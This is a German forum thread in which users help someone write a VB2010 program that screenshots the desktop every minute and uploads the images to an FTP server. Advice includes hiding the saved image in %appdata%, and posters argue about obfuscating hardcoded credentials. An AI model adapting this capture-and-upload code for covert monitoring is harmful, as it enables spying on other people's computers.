[VB2010] Picturebox auf FTP hochladen

12/04/2011 18:19 patschga#1
Hi,
ich habe in VB Prgramm erstellt, das jede Minute einen Screenshot vom Desktop in eine Picturebox lädt, das klappt ja schon mal gut, aber jetzt will ich, das jedes erstelle Screenshot auf meinem FTP server hochgeladen wird, mit verändertem namen . ich habe schon das geliche mit einer text datei gemacht, dort wird jede minute eine richtextbox hochgeladen, die als namen die uhrzeit und das datum bekommt. (das kalppt auch schon) Blos ich bekomms nicht auf die reihe das bild hochzuladen.

wäre dankbar um hilfe!

mfg
12/04/2011 22:39 .exTremez™#2
Lass das Bild aus der PictureBox auf deinem PC speichern(z.b als .jpg) und lad die bild datei dann hoch...

Source zum speichern vom Picturebox bild:
PHP Code:
Dim bild As Image PictureBox1.Image
Dim pfad 
as string "PFAD ZUM SPEICHERN"
bild.Save(pfad System.Drawing.Imaging.ImageFormat.Jpeg
Am besten lässt du es irgendwo in die %appdata% speichern oder sonstwo, wo das bild einem nicht so stört.

Nun lädst du das Bild ganz einfach mit deinem FTP-Upload code hoch.
PHP Code:
My.Computer.Network.UploadFile("Pfad zur Bilddatei""FTP-Host" "Gewünschter Dateiname""FTP-User""FTP-Pass"
12/05/2011 20:03 patschga#3
Hi,
danke hast mir sehr geholfen!

mfg
12/06/2011 07:10 IchVerabschiedeMich#4
Wobei ich auf FTP Upload verzichten würde das es sehr unsicher ist!
12/06/2011 14:41 .exTremez™#5
@Padrio: Das weiss glaube ich jeder, aber da er einen FTP Upload haben möchte gibt man ihm einfach einen ftpupload und ist ruhig ^^
12/06/2011 15:35 warfley#6
Mach nicht den umweg uber eine picbox, lade das bild direkt in eine bitmap oder ein image ohne visuelle komponente
12/07/2011 14:41 iDraGoN*#7
warum ist ein ftp bitteschön unsicher ?
12/07/2011 15:31 IchVerabschiedeMich#8
Quote:
Originally Posted by iDraGoN* View Post
warum ist ein ftp bitteschön unsicher ?
Schick mir mal dein Tool dann zeig ich es dir warum ;)
12/07/2011 17:16 .exTremez™#9
@iDraGoN*: Weil man die FTP-Daten im Tool irgendwo hinpacken muss...

Und wer nicht total dämlich ist kann diese daten dann in einpaar sekunden herauskriegen und hat dein ftp account ^^

Benutz PHP-Upload :)
12/08/2011 16:06 iDraGoN*#10
ahso dass meint ihr, eh ich hab grad hier kein tool da, aber ich mach immer bei daten decompile schutz drauf, also da wirste nicht fündig :)
ich kenn das, dass man bei phishing shit das macht, aber ich nutze eazfuscator dafür und habs auch so getestet und da findet man nichts mehr :P
12/08/2011 16:15 MoepMeep#11
Quote:
ahso dass meint ihr, eh ich hab grad hier kein tool da, aber ich mach immer bei daten decompile schutz drauf, also da wirste nicht fündig :)
ich kenn das, dass man bei phishing shit das macht, aber ich nutze eazfuscator dafür und habs auch so getestet und da findet man nichts mehr :P
Naivität ist was feines.
12/08/2011 17:19 .exTremez™#12
Quote:
Solche leute wie dich mag ich :D

Immer wenn ich neue tools finde, wo private daten im source stehen(egal ob obfuscated oder nicht) stelle ich mir immer die frage.

WIESO?? xD

Aber wenn ich deinen post lese dann wird mir alles klar xDD

Naja mach du nur mal ^^
12/08/2011 20:22 iDraGoN*#13
schön, wenn man so ironisch ist, doch dann mach mal ebend ein tool mit daten und sag mir wie du das noch rausholen willst nach obfuscate..
blöde sprüche, aber dann auch mal weiterhelfen nicht -.-
ausserdem bezieht sich bei mir daten auf dload links und nicht ftp oder sonstiges, dropbox ist da viel besser.
12/08/2011 22:23 .exTremez™#14
Da du immer mit deinem tollen obfuscater kommst xDD

Wie wärs mit DEobfuscaten du vollhorst...

Im fall von ftp daten kann man diese auch über sniffing tools (z.b wireshark) die daten rauskriegen, ohne deinen crap source anzuschauen
12/10/2011 01:43 patschga#15
Hi,
hab alles hingebracht. aber mein problem ist jetzt folgendes, es funktioniert nur wenn ich es im programm VB 2010 ausführe (debug im programm). Und wenn ich die exe in einen anderen ordner stecke funktioniert es nicht mehr. (die exe von Visual Studio 2010\Projects\PCT BETA\PCT BETA\bin\Debug
hoffe auf hilfe!

das ist mein code für das hochladen von dem screenshot:
PictureBox1.Image = screencapture()
Dim bild As Image = PictureBox1.Image
Dim pfad As String = ("screen.jpeg") (hier kann ich nur den datei namen eingeben aber nicht den direkten pfad wo es hingespeichert wird. (kommt fehlermeldung irgendwas mit gdi+)
bild.Save(pfad, System.Drawing.Imaging.ImageFormat.Jpeg)
My.Computer.Network.UploadFile("screen.jpeg", "ftp://pc-fs.co.de/www/pctbeta\screenshots\" & Label1.Text & (" | ") & Label2.Text & (" | ") & Label3.Text & (".jpeg"), "user", "passwort")

mfg